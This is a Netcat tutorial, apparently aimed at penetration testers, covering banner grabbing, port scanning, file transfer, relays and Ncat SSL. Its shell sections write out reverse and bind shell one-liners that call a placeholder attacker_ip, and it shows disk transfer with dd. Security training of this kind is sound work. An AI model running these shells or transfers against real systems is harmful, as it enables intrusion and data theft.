Netcat is often called the Swiss Army knife of networking — and for good reason. This deceptively simple tool can open raw TCP and UDP connections, listen on arbitrary ports, transfer files, scan ports, grab service banners, and set up reverse or bind shells. It ships on virtually every Unix-like system and has been a staple in penetration testers’ toolkits for decades. This guide covers every major use case with real commands you can start using immediately.
What Is Netcat?
Netcat (nc) is a command-line utility that reads and writes data across network connections using TCP or UDP. It operates without handshakes, authentication, or application-layer framing — just raw bytes. That simplicity is exactly what makes it so versatile.
Two main variants exist:
- Traditional Netcat — the original
nc, available on most Linux distros
- Ncat — an improved version from the Nmap project with SSL support, access control, and proxy support. Available as
ncat on Kali Linux.
- Netcat-OpenBSD — the variant on Debian/Ubuntu, with slightly different flags (
-e is removed for security)
Check which version you have:
nc --version
ncat --version
Basic Syntax
nc [options] [hostname] [port]
Common flags:
| Flag | Description |
|---|
-l | Listen mode |
-p <port> | Specify local port |
-v | Verbose output |
-vv | Very verbose |
-n | No DNS resolution |
-z | Zero-I/O mode (for scanning) |
-w <secs> | Connection timeout |
-u | Use UDP instead of TCP |
-e <cmd> | Execute command (traditional nc only) |
-k | Keep listening after client disconnects |
Banner Grabbing
Banner grabbing is the act of connecting to a service and reading the information it returns. This reveals software names, versions, and sometimes configuration details useful for vulnerability research.
# HTTP banner grab
echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -v target.com 80
# FTP banner
nc -v target.com 21
# SSH banner
nc -v target.com 22
# SMTP banner
nc -v target.com 25
# Grab and immediately close after 3 seconds
nc -w 3 -v target.com 8080
For a quick service fingerprint across multiple ports, combine with a loop:
for port in 21 22 25 80 443 8080 8443; do
echo -e "\n--- Port $port ---"
echo "" | nc -w 1 -v target.com $port 2>&1 | head -5
done
Port Scanning
While not as feature-rich as Nmap, Netcat can perform basic TCP port scans with the -z flag:
# Scan a range of ports
nc -zv target.com 1-1024
# Scan specific ports quietly
nc -zn target.com 22 80 443 3306 5432
# UDP scan
nc -zuv target.com 53 161 500
The -z flag sends no data — it just checks whether the port accepts a connection. Combine with 2>&1 and grep succeeded to parse open ports:
nc -zv target.com 1-65535 2>&1 | grep succeeded
File Transfer
Netcat makes an excellent quick file transfer tool when you do not have SCP or FTP access.
On the receiving machine (listener):
nc -lvp 4444 > received_file.txt
On the sending machine:
nc target_ip 4444 < file_to_send.txt
Transfer a directory by piping through tar:
# Receiver
nc -lvp 4444 | tar xvf -
# Sender
tar cvf - /path/to/directory | nc target_ip 4444
Transfer a disk image or binary:
# Receiver
nc -lvp 4444 > backup.img
# Sender
dd if=/dev/sda | nc target_ip 4444
Reverse Shells
A reverse shell causes the target machine to initiate a connection back to your listener. This is critical in penetration testing when the target is behind a firewall that blocks inbound connections.
Step 1 — Start your listener on the attacking machine:
nc -lvp 4444
Step 2 — Execute on the target (traditional nc with -e):
nc attacker_ip 4444 -e /bin/bash
Step 3 — If -e is not available (OpenBSD nc), use a named pipe:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker_ip 4444 > /tmp/f
Other reverse shell one-liners when nc is unavailable:
# Bash TCP reverse shell
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Python reverse shell
python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("attacker_ip",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
Bind Shells
A bind shell opens a listening port on the target machine. You then connect to it from your attacking machine. Useful when you can reach the target but cannot receive inbound connections yourself.
On the target machine:
nc -lvp 4444 -e /bin/bash
On the attacking machine:
nc target_ip 4444
With the named pipe method (no -e):
rm /tmp/f; mkfifo /tmp/f; nc -l -p 4444 < /tmp/f | /bin/bash > /tmp/f
Upgrading a Netcat Shell
Raw Netcat shells are non-interactive — they lack tab completion, arrow keys, and job control. Upgrade to a fully interactive TTY immediately:
# In the nc shell, spawn a PTY with Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background the shell with Ctrl+Z, then in your local terminal:
stty raw -echo; fg
# Set terminal size
export TERM=xterm
stty rows 40 cols 140
Chat / Simple Relay
You can use Netcat as a simple one-to-one chat tool on a local network:
Machine A (listener):
nc -lvp 9999
Machine B (connector):
nc 192.168.1.10 9999
Both sides can now type messages and press Enter to send.
Port Forwarding and Relay
Chain two Netcat instances to relay traffic through an intermediary host:
# On pivot host: forward port 8080 traffic to internal target
mkfifo /tmp/relay
nc -lvp 8080 < /tmp/relay | nc 192.168.10.5 80 > /tmp/relay
Using Ncat for SSL
Ncat (from the Nmap project) adds SSL support for encrypted connections:
# Listener with SSL
ncat --ssl -lvp 4444
# Connect with SSL
ncat --ssl target_ip 4444
# Generate a self-signed cert for Ncat
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
ncat --ssl --ssl-cert cert.pem --ssl-key key.pem -lvp 4444
Practical Tips
- Always set a timeout (
-w 3) when scanning to avoid hanging on filtered ports.
- Use
-n to skip DNS lookups and speed up scans.
- Upgrade shells immediately — raw Netcat shells are fragile and close on any SIGINT.
- For persistent listeners, use
-k to keep Ncat listening after a client disconnects: ncat -lvkp 4444.
- Log all traffic with Ncat’s
--output flag for documentation in authorized engagements.
Legal Reminder
Setting up shells, transferring files, and conducting port scans using Netcat is only legal within the scope of systems you own or have explicit written authorization to test. Unauthorized use violates computer fraud laws in virtually every jurisdiction. Use these techniques only in lab environments or during sanctioned penetration tests.
Summary
Netcat’s power lies in its simplicity. Whether you need to grab a service banner in under two seconds, exfiltrate data from a compromised host, establish a reverse shell during a CTF, or debug a custom network service — nc handles it with minimal syntax. It is one of the first tools you should master, and one of the last you will ever stop using.